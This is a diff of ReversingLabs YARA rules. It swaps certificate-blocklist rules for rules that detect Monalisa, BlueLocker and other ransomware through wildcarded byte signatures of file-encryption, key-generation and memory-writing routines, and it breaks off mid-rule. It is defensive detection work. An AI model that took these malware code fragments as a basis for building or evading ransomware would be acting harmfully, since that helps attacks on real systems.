+            ?? 6A ?? 57 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 74 24 ?? 66 C7 44
+            30 ?? ?? ?? C7 04 30 ?? ?? ?? ?? 8B 45 ?? 83 C6 ?? F2 0F 10 44 24 ?? 89 74 24 ?? 8B
+            08 8B 58 ?? F2 0F 11 44 24 ?? 8B 44 24 ?? 89 4C 24 ?? 29 F0 39 D8 73 ?? 53 56 8D 44
+            24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8B 44 24 ?? 01 F0 53 FF 74 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 01 DE 89 B4 24 ?? ?? ?? ?? F2 0F 11 84 24 ??
+            ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 56 53 57 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ?? 3C ?? 88 44 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7C 24 ?? 85
+            FF 0F 84 ?? ?? ?? ?? 8B 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 53 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
+            24 ?? 8B 4C 24 ?? 8B 5C 24 ?? 85 F6 89 44 24 ?? 89 4C 24 ?? 74 ?? 6A ?? 56 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 DB 74 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
+            50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24
+        }
+		$encrypt_files_full_v1_p1 = {
+            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 54 24 ?? 89 4C 24 ?? 6A ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C7 89 44 24 ??
+            0F 85 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 47 ?? 89 44 24 ?? EB ?? 66 2E 0F
+            1F 84 00 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 01 DF 89 7E ?? 8B 7C 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 44 24 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ??
+            ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48 ?? F2
+            0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ?? F2 0F
+            11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ?? 75 ??
+            E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 0F B6 5C 24 ?? 0F B7
+            54 24 ?? 81 FE ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10
+            44 24 ?? 66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2
+            0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24
+            ?? F2 0F 11 44 24 ?? F3 0F 7E 44 24 ?? 89 41 ?? 66 0F D6 41 ?? C7 41 ?? ?? ?? ?? ??
+            C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
+            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
+            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
+            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 59 ?? 66 89 51 ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0 89 7C
+        }
+		$encrypt_files_full_v1_p2 = {
+            24 ?? 89 7C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ?? 8D 4C
+            24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? F3 0F 6F 64
+            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
+            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
+            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
+            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
+            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
+            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
+            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
+            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
+            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
+            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
+            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
+            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 17 0F 82 ?? ?? ?? ?? 31 C9
+        }
+		$encrypt_files_full_v1_p3 = {
+            83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF 66 2E 0F 1F
+            84 00 ?? ?? ?? ?? 66 90 F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
+            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
+            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF 89 D9 83 E2
+            ?? 29 D1 90 F3 0F 7E 04 38 F3 0F 7E 8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83
+            C7 ?? 39 F9 75 ?? 85 D2 74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 40 ?? 0F B6 94 0C
+            ?? ?? ?? ?? 30 14 08 41 39 CB 75 ?? 88 9C 24 ?? ?? ?? ?? 89 F3 8B 74 24 ?? 8B 46 ??
+            8B 7E ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53 8B 7C 24 ?? 57 56 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54
+            24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F 10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB
+            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24
+            ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ?? BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ??
+            8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57 FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ??
+            ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
+        }
+		$encrypt_files_full_v2_p1 = {
+            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 D7 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C3 89 44 24 ?? 0F 85
+            ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 89 7C 24 ?? 89 44 24 ?? EB ?? 66
+            2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 01 DF 8B 5C 24 ?? 89 7E ?? 89 F7 68 ?? ?? ?? ?? 53 FF 74 24 ?? 8D 44 24 ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F
+            84 ?? ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48
+            ?? F2 0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ??
+            F2 0F 11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ??
+            75 ?? E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 8D 8C 24 ?? ??
+            ?? ?? 0F B7 54 24 ?? 81 FE ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ??
+            66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84
+            24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F
+            11 44 24 ?? 89 41 ?? F3 0F 7E 44 24 ?? 0F B6 44 24 ?? 66 0F D6 41 ?? C7 41 ?? ?? ??
+            ?? ?? C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 41 ?? 66 89 51
+            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0
+        }
+		$encrypt_files_full_v2_p2 = {
+            89 5C 24 ?? 89 5C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ??
+            8D 4C 24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 F3 0F 6F 64
+            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
+            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
+            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
+            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
+            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
+            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
+            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
+            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
+            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
+            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
+            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
+            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 8B 44 24 ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 10 0F 82 ?? ??
+            ?? ?? 31 C9 83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF
+        }
+		$encrypt_files_full_v2_p3 = {
+            0F 1F 84 00 ?? ?? ?? ?? F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
+            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
+            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 8B 7C 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF
+            89 D9 83 E2 ?? 29 D1 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 F3 0F 7E 04 38 F3 0F 7E
+            8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83 C7 ?? 39 F9 75 ?? 8B 7C 24 ?? 85 D2
+            74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F B6 94 0C ?? ?? ?? ?? 30 14 08 41 39 CB 75 ??
+            88 9C 24 ?? ?? ?? ?? 89 F3 8B 47 ?? 89 FE 8B 7F ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53
+            8B 5C 24 ?? 53 56 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 89 F7 3C ??
+            0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54 24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ??
+            ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F
+            10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 53 FF
+            74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ??
+            BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57
+            FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sasha catering ltd" and pe.signatures [ i ] . serial == "3e:79:55:31:b3:26:55:10:f9:35:18:7e:ca:59:92:0a" and 1557243644 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $collect_files_recursively_p* ) ) and ( $get_valid_drives ) and ( ( ( all of ( $encrypt_files_full_v1_p* ) ) ) or ( ( all of ( $encrypt_files_full_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_8F40B1485309A064A28B96Bfa3F55F36 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Monalisa : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Monalisa ransomware."
 		author = "ReversingLabs"
-		id = "bad5b57e-185a-5872-9817-a7d688e24fe7"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "34addb63-2426-59a2-b79b-052a9161d361"
+		date = "2022-05-13"
+		modified = "2022-05-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3194-L3212"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "58dd47bfd2acd698bc27fb03eb51e4b8598ef6c71f7193e3cc4eea63982855f0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Monalisa.yara#L1-L83"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0bcb79dff111ec05ac93bbe9a777546bd6234dc60d9f6982c03cd0bc3b26b038"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Monalisa"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 A1 ?? ?? ?? ?? 33
+            C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B CC 89 65
+            ?? 8D 45 ?? B3 ?? 51 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 33 C0 6A
+            ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 E8 ?? ?? ?? ??
+            83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8A D3 88 5D ?? 8B CE E8 ?? ??
+            ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
+        }
+		$write_proc_mem = {
+            8D 45 ?? 50 FF 76 ?? 8B 46 ?? 03 C7 50 8B 06 03 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 3E 0F B7 41 ?? 48 3B D8 75 ?? 8B 51 ??
+            EB ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 56 ?? 8B 4E ?? 2B D7 8B C1 25 ??
+            ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ??
+            ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ??
+            ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 85 C9
+            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 48 C1 8D 4D ?? 51 50 8B 45 ?? 52 03 C7 50 FF 75 ??
+            FF 15
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 50
+            8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ??
+            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 51 0F 43 05 ?? ?? ?? ?? 50 6A ?? 68 ??
+            ?? ?? ?? 51 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 05 ?? ?? ?? ?? ?? ?? ??
+            ?? 0F 10 00 0F 11 05 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 05 ?? ?? ?? ?? C7 40 ?? ??
+            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 89 08 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ??
+            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64
+            89 0D ?? ?? ?? ?? 59 8B E5 5D C3
+        }
+		$generate_key = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 75 ??
+            8B 0C 88 A1 ?? ?? ?? ?? 3B 81 ?? ?? ?? ?? 7F ?? 56 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 45 ?? 50 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Singh Agile Content Design Limited" and ( pe.signatures [ i ] . serial == "00:8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" or pe.signatures [ i ] . serial == "8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" ) and 1542585600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $write_proc_mem ) and ( $generate_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B2120Facadbb92Cc0A176759604C6A0F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bluelocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlueLocker ransomware."
 		author = "ReversingLabs"
-		id = "8a90cc61-4d39-58eb-a102-c22d096d99ae"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "145ff05e-c90d-598a-a3d5-220bd6df718a"
+		date = "2022-08-04"
+		modified = "2022-08-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3214-L3232"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "08462b1bd3d45824aeea901a4db19365c28d8b8b0f594657df7a59250111729b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BlueLocker.yara#L1-L130"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fbe5f246f4554e63b5da6a0aca169e8221a84fce18fd437ae7ad9b068e9ca576"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlueLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
